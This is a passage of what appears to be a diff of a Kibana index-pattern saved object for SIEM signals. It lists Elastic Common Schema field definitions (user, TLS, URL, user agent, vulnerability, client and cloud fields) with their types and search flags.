},{\"count\":0,\"name\":\"source.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.name\"}}},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.cipher\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.ja3\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.server_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.supported_ciphers\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.curve\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.established\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.next_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.resumed\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.ja3s\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"trace.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"transaction.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.fragment\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.full\"}}},{\"count\":0,\"name\":\"url.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.original\"}}},{\"count\":0,\"name\":\"url.password\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.scheme\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.full_name\"}}},{\"count\":0,\"name\":\"user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}},{\"count\":0,\"name\":\"user_agent.device.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.original\"}}},{\"count\":0,\"name\":\"user_agent.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.full\"}}},{\"count\":0,\"name\":\"user_agent.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.name\"}}},{\"count\":0,\"name\":\"user_agent.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.classification\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"vulnerability.description\"}}},{\"count\":0,\"name\":\"vulnerability.enumeration\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.report_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.scanner.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.base\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.environmental\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.temporal\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": ".siem-signals-*"}, "coreMigrationVersion": "7.16.2", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152853649, 1942], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"as.organization.name\"}}},{\"count\":0,\"name\":\"client.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.as.organization.name\"}}},{\"count\":0,\"name\":\"client.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.full_name\"}}},{\"count\":0,\"name\":\"client.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.name\"}}},{\"count\":0,\"name\":\"cloud.account.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.availability_zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.machine.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.region\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"